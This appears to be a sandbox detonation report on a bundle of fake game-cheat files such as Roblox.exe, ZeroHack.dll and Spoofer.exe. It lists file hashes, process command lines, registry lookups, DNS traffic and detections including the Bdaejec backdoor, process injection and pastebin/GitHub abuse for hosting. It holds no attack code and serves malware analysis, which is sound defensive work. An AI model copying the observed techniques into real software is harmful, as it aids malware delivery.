memory/2064-12-0x0000011548060000-0x0000011548082000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m3m1p1a5.dma.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2064-13-0x00007FF891680000-0x00007FF892142000-memory.dmp
memory/2064-14-0x00007FF891680000-0x00007FF892142000-memory.dmp
memory/2064-15-0x00007FF891680000-0x00007FF892142000-memory.dmp
memory/2064-16-0x00007FF891680000-0x00007FF892142000-memory.dmp
memory/2064-19-0x00007FF891680000-0x00007FF892142000-memory.dmp
memory/2064-20-0x00007FF891680000-0x00007FF892142000-memory.dmp
C:\Windows\System32\$Node32.exe
| MD5 | b850f016450d68da0ae4bb945355f70c |
| SHA1 | 521726c38af715e6ee1c76315151f0ed9518c6f4 |
| SHA256 | 8a649909d1defa1b8966cde6ad854f3cbf7662a732cf1a16b853c793cf240d24 |
| SHA512 | 30f152e08ba44308da9b9c42951e45a9b6c2ad808c3a426da4af0384939816e04f1faf38de1d3c404e515d90b2e2eaeabe152b0151fb3f21c6a00bd2fdac3b6c |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 3eb3833f769dd890afc295b977eab4b4 |
| SHA1 | e857649b037939602c72ad003e5d3698695f436f |
| SHA256 | c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485 |
| SHA512 | c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b5bf6b0261deb53c0e3d422e3f83a664 |
| SHA1 | 60cd83ab6dd15abaa9abf34d9ab54e42c8eefa16 |
| SHA256 | a431a9e84c64c6ad29339df6a714cb697081dc1c6c5557ada967d4caaeed0c1c |
| SHA512 | 27dfba0d2d7ebce4e6eebdeefa81b2518c5222efb9d37b4c323023e5117eed30ad6aeba8e062bde96d17d53b01bb9a59313229aeaf4863c8b30d9bbb09d46bff |
C:\Windows\System32\$Node2Json.exe
| MD5 | 41814c2aa6f0aaffaaaa26ffd07b3550 |
| SHA1 | ea9731c42a382ed003b5b4bfd28c3ba437c8d14a |
| SHA256 | da2926ac30bda874255c093b58a8a4efa4b8e7872393ea4a242f17a4e3ab014e |
| SHA512 | f2513d8e10536bd747dd1ec4a6aa9ec0007ea9a4484c364b2cf9d5ffd42cf3bcd0e346040d4c34c3dba28a208752b82c41bdae2a9dd88ebc1ba869cd1907877d |
memory/3788-70-0x0000000000850000-0x0000000000872000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 380667346230f568b33ee306d145cd0c |
| SHA1 | 761128658280c2f8070f879fe0173759e2147421 |
| SHA256 | 34fd03e6c7b265c580eff0085960004daaa90c16473cbc236c263a453767c4c8 |
| SHA512 | 32b89cffccf694b51872b9088759e3c6cd1e2c3fcbd0219b24fd1f7f191422fecaad6f77c9d57330281826c3609587cba942994de077662d9d1606a57f64a55b |
C:\Windows\System32\$Node3Json.exe
| MD5 | 391d4f99d0076ce566b370f1572ef670 |
| SHA1 | 0bf04beb77440315098bacf30563a6542e254a45 |
| SHA256 | b55dbc5b3437654eca9fd1ea4826f81bde74af9e0c69109c25188461eb6a3605 |
| SHA512 | 1952fa90fc139863381c15f424a8146335cbbc6f443efcdffc502f1064889a244fa7da1b30ebd4c9b2bec15fd55d367a2aa80afd576b1e2c4baed40ffec76497 |
memory/3280-100-0x00000000004C0000-0x00000000004E2000-memory.dmp
memory/2568-101-0x00007FF891680000-0x00007FF892142000-memory.dmp
memory/1300-104-0x00007FF8AF530000-0x00007FF8AF5ED000-memory.dmp
memory/1300-103-0x00007FF8AFAF0000-0x00007FF8AFCE8000-memory.dmp
memory/324-110-0x0000000140000000-0x0000000140008000-memory.dmp
memory/324-112-0x00007FF8AF530000-0x00007FF8AF5ED000-memory.dmp
memory/324-111-0x00007FF8AFAF0000-0x00007FF8AFCE8000-memory.dmp
memory/324-113-0x0000000140000000-0x0000000140008000-memory.dmp
memory/408-150-0x000001F94FF70000-0x000001F94FF9A000-memory.dmp
memory/400-164-0x00007FF86FB70000-0x00007FF86FB80000-memory.dmp
memory/400-163-0x0000027C4C1C0000-0x0000027C4C1EA000-memory.dmp
memory/400-158-0x0000027C4C1C0000-0x0000027C4C1EA000-memory.dmp
memory/408-154-0x00007FF86FB70000-0x00007FF86FB80000-memory.dmp
memory/408-153-0x000001F94FF70000-0x000001F94FF9A000-memory.dmp
memory/964-144-0x00007FF86FB70000-0x00007FF86FB80000-memory.dmp
memory/964-143-0x000001F4F1DA0000-0x000001F4F1DCA000-memory.dmp
memory/964-138-0x000001F4F1DA0000-0x000001F4F1DCA000-memory.dmp
memory/676-133-0x0000020DDE630000-0x0000020DDE65A000-memory.dmp
memory/676-134-0x00007FF86FB70000-0x00007FF86FB80000-memory.dmp
memory/676-128-0x0000020DDE630000-0x0000020DDE65A000-memory.dmp
memory/628-124-0x00007FF86FB70000-0x00007FF86FB80000-memory.dmp
memory/628-123-0x0000025298080000-0x00000252980AA000-memory.dmp
memory/628-118-0x0000025298080000-0x00000252980AA000-memory.dmp
memory/628-117-0x0000025298080000-0x00000252980AA000-memory.dmp
memory/628-116-0x0000025298050000-0x0000025298075000-memory.dmp
memory/324-107-0x0000000140000000-0x0000000140008000-memory.dmp
memory/324-108-0x0000000140000000-0x0000000140008000-memory.dmp
memory/324-105-0x0000000140000000-0x0000000140008000-memory.dmp
memory/324-106-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1300-102-0x00000147D7250000-0x00000147D727A000-memory.dmp
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | a9124c4c97cba8a07a8204fac1696c8e |
| SHA1 | 1f27d80280e03762c7b16781608786f5a98ff434 |
| SHA256 | 8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21 |
| SHA512 | 537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 4ac1741ceb19f5a983079b2c5f344f5d |
| SHA1 | f1ebd93fbade2e035cd59e970787b8042cdd0f3b |
| SHA256 | 7df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc |
| SHA512 | 583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | 39b9eb9d1a56bc1792c844c425bd1dec |
| SHA1 | db5a91082fa14eeb6550cbc994d34ebd95341df9 |
| SHA256 | acade97e8a1d30477d0dc3fdfea70c2c617c369b56115ec708ed8a2cfdbc3692 |
| SHA512 | 255b1c1c456b20e6e3415540ef8af58e723f965d1fa782da44a6bbc81b43d8a31c5681777ba885f91ed2dae480bc2a4023e01fe2986857b13323f0459520eb51 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | c6086d02f8ce044f5fa07a98303dc7eb |
| SHA1 | 6116247e9d098b276b476c9f4c434f55d469129c |
| SHA256 | 8901d9c9aea465da4ea7aa874610a90b8cf0a71eba0e321cf9675fceee0b54a0 |
| SHA512 | 1876d8fc1a8ac83aadb725100ea7a1791bd62d4d0edc1b78802e0bffe458f309a66dc97e1b9da60dd52b8cb80bf471ccb5f8480e6192c9eb2a13eac36462d27a |
Analysis: behavioral19
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
92s
Max time network
147s
Command Line
Signatures
Downloads MZ/PE file
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Roblox.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Roblox.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Roblox.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Roblox.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Roblox.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 2024
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
memory/4396-0-0x00000000743BE000-0x00000000743BF000-memory.dmp
memory/4396-1-0x0000000000A00000-0x0000000000A0E000-memory.dmp
memory/4396-2-0x00000000743B0000-0x0000000074B61000-memory.dmp
memory/4396-3-0x00000000743BE000-0x00000000743BF000-memory.dmp
memory/4396-4-0x00000000743B0000-0x0000000074B61000-memory.dmp
memory/4396-5-0x00000000743B0000-0x0000000074B61000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
96s
Max time network
146s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5972 wrote to memory of 5744 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 5972 wrote to memory of 5744 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 5972 wrote to memory of 5744 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Deadly.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Deadly.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5744 -ip 5744
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 576
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5744 -ip 5744
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 808
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
149s
Max time network
156s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4696 wrote to memory of 2660 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4696 wrote to memory of 2660 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4696 wrote to memory of 2660 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ZeroHack.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ZeroHack.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
Files
Analysis: behavioral26
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
149s
Max time network
156s
Command Line
Signatures
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1544 wrote to memory of 1636 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1544 wrote to memory of 1636 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1544 wrote to memory of 1636 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\gamesnus.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\gamesnus.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| SE | 192.229.221.95:80 | tcp |
Files
memory/1636-0-0x0000000074880000-0x0000000074D13000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
148s
Max time network
156s
Command Line
Signatures
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_ZeroHackSafe.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_ZeroHackSafe.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_ZeroHackSafe.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_ZeroHackSafe.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_ZeroHackSafe.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
Files
memory/4340-0-0x00007FF6820D9000-0x00007FF682442000-memory.dmp
memory/4340-1-0x00007FFBD0150000-0x00007FFBD0152000-memory.dmp
memory/4340-2-0x00007FFBD0160000-0x00007FFBD0162000-memory.dmp
memory/4340-4-0x00007FF6820D0000-0x00007FF68297F000-memory.dmp
memory/4340-5-0x00007FF6820D9000-0x00007FF682442000-memory.dmp
memory/4340-6-0x00007FF6820D0000-0x00007FF68297F000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
90s
Max time network
168s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Spoofer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Spoofer.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4988 wrote to memory of 948 | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Spoofer.exe | C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe |
| PID 4988 wrote to memory of 948 | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Spoofer.exe | C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Spoofer.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Spoofer.exe"
C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe
"C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
Files
memory/4988-0-0x00007FF8CFA93000-0x00007FF8CFA95000-memory.dmp
memory/4988-1-0x0000000000BA0000-0x0000000000D06000-memory.dmp
memory/4988-2-0x00007FF8CFA90000-0x00007FF8D0552000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe
| MD5 | 6606c3f98d9f8fae5e9c5337eec434c4 |
| SHA1 | ea0d27f6ee5c7d5a97cdaebac02e48da5a17e577 |
| SHA256 | a48b56504cd8581af88cf3d4dd61549e3d00573318962ab1c3af53aef723c337 |
| SHA512 | 7e8787c296123cf0306adc5e545119bb345b4f267beb03a5657eeb4d59673eeac05c04307abeb9dc1cd91290f71736d6d8991049eddacdda44f9cf6c6b631599 |
C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.runtimeconfig.json
| MD5 | 9db099f143ead47e224653d0dde19fe9 |
| SHA1 | d050db767fc64aa1705353132da3e35048475d3c |
| SHA256 | 7e79af92820e50910b90f1cade2728f45987393f24b50e384dc225d9773b7194 |
| SHA512 | 579c3c870903b3d47dbc2567153fa7c73e0aa47387c6969b8982037884033a4b25de702e0efb8c7ae717b6b463192b917b18a79b1ef5f8c969f257422af2b65f |
C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.deps.json
| MD5 | 1f8022d231b0c479e19eb86a10312c4f |
| SHA1 | eebe57abb1999de25b03fb23c6247e420c3f355b |
| SHA256 | 86c9558da38267d785e4f6d78056778b673aaed42cbd8f704b1dd64811d08f3d |
| SHA512 | 3c14143d5d9d60f9c8f572276c4f6d0ee0712760ce63fddae620f099fdf46e28f15f929584737e3cb028fffa4ba2819550f66a68f90cc8a3a2ebdbf9d7dfbd94 |
memory/4988-27-0x00007FF8CFA90000-0x00007FF8D0552000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.dll
| MD5 | d0902a9df335a37f1dd5ad5ce1223928 |
| SHA1 | e1526d6ecc8c293333a6d6b813260349a18b140f |
| SHA256 | 275c1257d4c2dacc787f3f80f2cdc2328552f09d8c87b5b6226a9cd712dd8f0b |
| SHA512 | 4d1c655a4cd44c0e3e28234ab87c4f0331d02a5ee9c4d340dd6c4b765d88b27ddcced490bec9010cfd5ea6376ce45c1d7143656998ee2018b3516a1c36d3e218 |
memory/948-29-0x0000012599030000-0x0000012599031000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Guna.UI2.dll
| MD5 | b429ae86c5be521bc8ca3b164cec3acb |
| SHA1 | 387560073ff5a1f2191abc6f75fc34532bbb6dd2 |
| SHA256 | 3ac70532408b89159bfe235d4ed228faa03ae3fbd63ec6a82d895f287a3b0579 |
| SHA512 | eae65de53da50708983ed8ebf9e1e3dd5f9aea95a354d272e199bb59517f62bfe35f0df7a37d81ab0423d0d6d29304fa70284c731bd54023e446b2c19bacafb1 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
97s
Max time network
146s
Command Line
Signatures
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ExecuteSafe.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ExecuteSafe.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ExecuteSafe.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ExecuteSafe.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ExecuteSafe.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ExecuteSafe.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
Files
memory/2388-0-0x00007FF72AC70000-0x00007FF72B1E2000-memory.dmp
memory/2388-1-0x00007FF955DB1000-0x00007FF955DB3000-memory.dmp
memory/2388-3-0x00007FF72AC70000-0x00007FF72B1E2000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
149s
Max time network
159s
Command Line
Signatures
Bdaejec
Bdaejec family
Detects Bdaejec Backdoor.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stops running service(s)
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Integration\Integrator.exe | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSOSYNC.EXE | C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe | N/A |
